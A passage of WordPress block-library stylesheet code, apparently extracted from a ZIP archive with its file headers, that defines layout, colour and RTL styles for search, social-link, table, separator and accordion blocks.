10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button{box-sizing:border-box;display:flex;flex-shrink:0;justify-content:center;margin-left:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-search__input){appearance:none;border:1px solid #949494;flex-grow:1;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){background-color:#fff;border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:right}.wp-block-separator{border:none;border-top:2px solid}:root :where(.wp-block-separator.is-style-dots){height:auto;line-height:1;text-align:center}:root :where(.wp-block-separator.is-style-dots):before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}.wp-block-separator.is-style-dots{background:none!important;border:none!important}.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}.wp-block-site-tagline,.wp-block-site-title{box-sizing:border-box}.wp-block-site-title :where(a){color:inherit;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit}.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block}@media not (prefers-reduced-motion){.wp-block-social-link{transition:transform .1s ease}}.wp-block-social-link{height:auto}.wp-block-social-link a{align-items:center;display:flex;line-height:0}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{background-color:#f0f0f0;color:#444}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{background-color:#f90;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{background-color:#0757fe;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{background-color:#0a7aff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-discord{background-color:#5865f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{background-color:#f45800;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{background-color:#0866ff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{background-color:#0461dd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{background-color:#e65678;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{background-color:#24292d;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{background-color:#ea4434;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{background-color:#1d4fc4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{background-color:#f00075;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{background-color:#f6405f;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{background-color:#e60122;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{background-color:#ef4155;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{background-color:#ff4500;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{background-color:#0478d7;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{background-color:#fefc00;color:#fff;stroke:#000}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{background-color:#1bd760;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{background-color:#2aabee;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{background-color:#011835;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{background-color:#6440a4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{background-color:#4680c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{background-color:#d32422;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{background-color:red;color:#fff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link{background:none}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{height:1.25em;width:1.25em}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{color:#f90}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{color:#1ea0c3}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{color:#0757fe}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{color:#0a7aff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{color:#1e1f26}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{color:#02e49b}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-discord{color:#5865f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{color:#e94c89}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{color:#4280ff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{color:#f45800}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{color:#0866ff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{color:#0461dd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{color:#e65678}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{color:#24292d}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{color:#382110}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{color:#ea4434}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{color:#1d4fc4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{color:#f00075}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{color:#e21b24}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{color:#0d66c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{color:#3288d4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{color:#f6405f}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{color:#e60122}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{color:#ef4155}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{color:#ff4500}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{color:#0478d7}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{color:#fff;stroke:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{color:#ff5600}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{color:#1bd760}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{color:#2aabee}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{color:#011835}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{color:#6440a4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{color:#1da1f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{color:#1eb7ea}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{color:#4680c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{color:#25d366}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{color:#3499cd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{color:#d32422}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}:root :where(.wp-block-social-links .wp-social-link a){padding:.25em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){padding:0}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){padding-left:.6666666667em;padding-right:.6666666667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}.wp-block-spacer{clear:both}.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud a{display:inline-block;margin-right:5px}.wp-block-tag-cloud span{display:inline-block;margin-left:5px;text-decoration:none}:root :where(.wp-block-tag-cloud.is-style-outline){display:flex;flex-wrap:wrap;gap:1ch}:root :where(.wp-block-tag-cloud.is-style-outline a){border:1px solid;font-size:unset!important;margin-right:0;padding:1ch 2ch;text-decoration:none!important}.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:initial;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:#0000}.wp-block-table.is-style-stripes{border-bottom:1px solid #f0f0f0}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:initial}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:initial}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}:root :where(.wp-block-table-of-contents){box-sizing:border-box}.wp-block-term-count{box-sizing:border-box}:where(.wp-block-term-description){box-sizing:border-box;margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-term-description p{margin-bottom:0;margin-top:0}.wp-block-term-name{box-sizing:border-box}.wp-block-term-template{box-sizing:border-box;list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-left:0}.wp-block-text-columns .wp-block-column:last-child{margin-right:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.3333333333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}.wp-block-video{box-sizing:border-box}.wp-block-video video{height:auto;vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video :where(figcaption){margin-bottom:1em;margin-top:.5em}.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:left;text-indent:0}:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-right-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-left-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-right-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}PK!:''dist/block-library/elements.cssnu[.wp-element-button{ cursor:pointer; }PK!&=!ll!dist/block-library/common-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .wp-element-button{ cursor:pointer; } :root .has-very-light-gray-background-color{ background-color:#eee; } :root .has-very-dark-gray-background-color{ background-color:#313131; } :root .has-very-light-gray-color{ color:#eee; } :root .has-very-dark-gray-color{ color:#313131; } :root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{ background:linear-gradient(-135deg, #00d084, #0693e3); } :root .has-purple-crush-gradient-background{ background:linear-gradient(-135deg, #34e2e4, #4721fb 50%, #ab1dfe); } :root .has-hazy-dawn-gradient-background{ background:linear-gradient(-135deg, #faaca8, #dad0ec); } :root .has-subdued-olive-gradient-background{ background:linear-gradient(-135deg, #fafae1, #67a671); } :root .has-atomic-cream-gradient-background{ background:linear-gradient(-135deg, #fdd79a, #004a59); } :root .has-nightshade-gradient-background{ background:linear-gradient(-135deg, #330968, #31cdcf); } :root .has-midnight-gradient-background{ background:linear-gradient(-135deg, #020381, #2874fc); } :root{ --wp--preset--font-size--normal:16px; --wp--preset--font-size--huge:42px; } .has-regular-font-size{ font-size:1em; } .has-larger-font-size{ font-size:2.625em; } .has-normal-font-size{ font-size:var(--wp--preset--font-size--normal); } .has-huge-font-size{ font-size:var(--wp--preset--font-size--huge); } .has-text-align-center{ text-align:center; } .has-text-align-left{ text-align:left; } .has-text-align-right{ text-align:right; } .has-fit-text{ white-space:nowrap !important; } #end-resizable-editor-section{ display:none; } .aligncenter{ clear:both; } .items-justified-left{ justify-content:flex-start; } .items-justified-center{ justify-content:center; } .items-justified-right{ justify-content:flex-end; } .items-justified-space-between{ justify-content:space-between; } .screen-reader-text{ border:0; clip-path:inset(50%); height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; word-wrap:normal !important; } .screen-reader-text:focus{ background-color:#ddd; clip-path:none; color:#444; display:block; font-size:1em; height:auto; line-height:normal; padding:15px 23px 14px; right:5px; text-decoration:none; top:5px; width:auto; z-index:100000; } html :where(.has-border-color){ border-style:solid; } html :where([style*=border-top-color]){ border-top-style:solid; } html :where([style*=border-right-color]){ border-left-style:solid; } html :where([style*=border-bottom-color]){ border-bottom-style:solid; } html :where([style*=border-left-color]){ border-right-style:solid; } html :where([style*=border-width]){ border-style:solid; } html :where([style*=border-top-width]){ border-top-style:solid; } html :where([style*=border-right-width]){ border-left-style:solid; } html :where([style*=border-bottom-width]){ border-bottom-style:solid; } html :where([style*=border-left-width]){ border-right-style:solid; } html :where(img[class*=wp-image-]){ height:auto; max-width:100%; } :where(figure){ margin:0 0 1em; } html :where(.is-position-sticky){ --wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height, 0px); } @media screen and (max-width:600px){ html :where(.is-position-sticky){ --wp-admin--admin-bar--position-offset:0px; } }PK!+""'dist/block-library/elements-rtl.min.cssnu[.wp-element-button{cursor:pointer}PK!B $dist/block-library/theme-rtl.min.cssnuȯ.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote :where(cite),.wp-block-pullquote :where(footer),.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-right:.25em solid;margin:0 0 1.75em;padding-right:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote:where(.has-text-align-right){border-left:.25em solid;border-right:none;padding-left:1em;padding-right:0}.wp-block-quote:where(.has-text-align-center){border:none;padding-right:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}PK!K yAAdist/block-library/classic.cssnuȯ.wp-block-button__link{ background-color:#32373c; border-radius:9999px; box-shadow:none; color:#fff; font-size:1.125em; padding:calc(.667em + 2px) calc(1.333em + 2px); text-decoration:none; } .wp-block-file__button{ background:#32373c; color:#fff; } .wp-block-accordion-heading{ margin:0; } .wp-block-accordion-heading__toggle{ background-color:inherit !important; color:inherit !important; } .wp-block-accordion-heading__toggle:not(:focus-visible){ outline:none; } .wp-block-accordion-heading__toggle:focus,.wp-block-accordion-heading__toggle:hover{ background-color:inherit !important; border:none; box-shadow:none; color:inherit; padding:var(--wp--preset--spacing--20, 1em) 0; text-decoration:none; } .wp-block-accordion-heading__toggle:focus-visible{ outline:auto; outline-offset:0; }PK!9dist/block-library/style.cssnuȯ@charset "UTF-8"; .wp-block-accordion{ box-sizing:border-box; } .wp-block-accordion-item.is-open>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{ transform:rotate(45deg); } @media (prefers-reduced-motion:no-preference){ .wp-block-accordion-item{ transition:grid-template-rows .3s ease-out; } .wp-block-accordion-item>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{ transition:transform .2s ease-in-out; } } .wp-block-accordion-heading__toggle{ align-items:center; background:none; border:none; color:inherit; cursor:pointer; display:flex; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; overflow:hidden; padding:var(--wp--preset--spacing--20, 1em) 0; text-align:inherit; text-decoration:inherit; text-transform:inherit; width:100%; word-spacing:inherit; } .wp-block-accordion-heading__toggle:not(:focus-visible){ outline:none; } .wp-block-accordion-heading__toggle:hover .wp-block-accordion-heading__toggle-title{ text-decoration:underline; } .wp-block-accordion-heading__toggle-title{ flex:1; } .wp-block-accordion-heading__toggle-icon{ align-items:center; display:flex; height:1.2em; justify-content:center; width:1.2em; } 